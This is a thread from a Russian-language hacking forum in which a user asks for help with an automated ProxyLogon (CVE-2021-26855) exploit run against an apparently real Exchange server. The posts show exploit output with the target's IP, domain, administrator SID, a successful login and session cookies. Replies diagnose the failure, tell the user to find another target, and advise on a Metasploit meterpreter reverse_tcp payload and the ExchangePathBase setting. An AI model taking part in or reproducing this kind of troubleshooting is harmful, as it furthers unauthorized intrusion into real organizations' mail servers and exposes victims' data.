• XSS.stack #1 – первый литературный журнал от юзеров форума

[Нужна помощь] Proxylogon

developer_ing

MEGAclient
Пользователь
Регистрация
20.06.2022
Сообщения
45
Реакции
13
Всем привет, использую автоматический эксплойт, после данных выводов выдает ошибку и закрывается, что не так?

Код:
[*] Target: https://4.34.179.58
(*) Got FQDN: MAIL
(+) Target is Vuln to SSRF [CVE-2021-26855]!
(*) Getting Information Server
(+) Computer Name = MAIL
(+) Domain Name = mail.datamax.local
(+) Guest SID = S-1-5-18=rJqNiZqNgbKelpPRu56LnpKeh9GTkJyek4HOxsvOxsbJyMzPgc3Pzc3Sz8jSzsqrzs3Fz8bFzM4=
(*) Domain [or just Enter] =
(*) Find valid mail from users list
(+) administrator@datamax.local
(+) Found User SID = S-1-5-21-576138710-923427440-3053470376-500
(+) Fixed User SID = S-1-5-21-576138710-923427440-3053470376-500
(+) Login success!!!
(+) Cookie = ASP.NET_SessionId=5c5d3ef2-89c3-471d-adbd-e4df666864eb; msExchEcpCanary=DSBJa2WUYU-b4fEZ4XLSLu2Lbd7rZ9oIBefzdwgmB6tLREaVI4euk8WNS5BTDrQXwTwhplfW5dU.
=========== It means good to go!!!====
(-) GetOAB Error!

Сам питоновский код после которого вылезает ошибка -
Python:
if ct.status_code != 200 or "RawIdentity" not in ct.text:
        print("(-) GetOAB Error!")
        exit()
 
Логично же что скрипт не отработал соответственно таргет не подвержен этой уязве.
Просто на одном из этапов возникла шибка и судя по тому что в скрипте она обрабатываеться значит это нормальное поведение, посто таргет пофикшен.
 
Всем привет, использую автоматический эксплойт, после данных выводов выдает ошибку и закрывается, что не так?

Код:
[*] Target: https://4.34.179.58
(*) Got FQDN: MAIL
(+) Target is Vuln to SSRF [CVE-2021-26855]!
(*) Getting Information Server
(+) Computer Name = MAIL
(+) Domain Name = mail.datamax.local
(+) Guest SID = S-1-5-18=rJqNiZqNgbKelpPRu56LnpKeh9GTkJyek4HOxsvOxsbJyMzPgc3Pzc3Sz8jSzsqrzs3Fz8bFzM4=
(*) Domain [or just Enter] =
(*) Find valid mail from users list
(+) administrator@datamax.local
(+) Found User SID = S-1-5-21-576138710-923427440-3053470376-500
(+) Fixed User SID = S-1-5-21-576138710-923427440-3053470376-500
(+) Login success!!!
(+) Cookie = ASP.NET_SessionId=5c5d3ef2-89c3-471d-adbd-e4df666864eb; msExchEcpCanary=DSBJa2WUYU-b4fEZ4XLSLu2Lbd7rZ9oIBefzdwgmB6tLREaVI4euk8WNS5BTDrQXwTwhplfW5dU.
=========== It means good to go!!!====
(-) GetOAB Error!

Сам питоновский код после которого вылезает ошибка -
Python:
if ct.status_code != 200 or "RawIdentity" not in ct.text:
        print("(-) GetOAB Error!")
        exit()
(-) GetOAB Error! ---> директория скорее всего не найдена
 
Логично же что скрипт не отработал соответственно таргет не подвержен этой уязве.
Просто на одном из этапов возникла шибка и судя по тому что в скрипте она обрабатываеться значит это нормальное поведение, посто таргет пофикшен.
Почему тогда первая часть скрипта отработала и вывелась в Success
 
Почему тогда первая часть скрипта отработала и вывелась в Success
Потому что сама атака состоит из нескольких частей, не факт что каждая из них отработает, это многоступенчатая атака и на каждом шаге есть вероятость того что она не отработает.
Видно что сам скрипт отрабатывает, проблема в таргете. Не валид вообщем, ищи другой.
 
подниму тему, запускаю все в метасе, таргет уязвим, мыло валидное, на выходе же косяк с пайлоадом, юзал по дефолту
windows/x64/meterpreter/reverse_tcp
куда еще можно копнуть?
Screenshot_43.png
 
подниму тему, запускаю все в метасе, таргет уязвим, мыло валидное, на выходе же косяк с пайлоадом, юзал по дефолту
windows/x64/meterpreter/reverse_tcp
куда еще можно копнуть?
Посмотреть вложение 62932
путь серверный попробуй поменять, помню по проксишеллу там их много может быть вариаций. options или show advanced. дальше ищи чему равен ExchangePathBase
 
этот момент не особо понятен
в options или show advanced хз где выведет переменные и их значения, поищи среди них ExchangePathBase
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх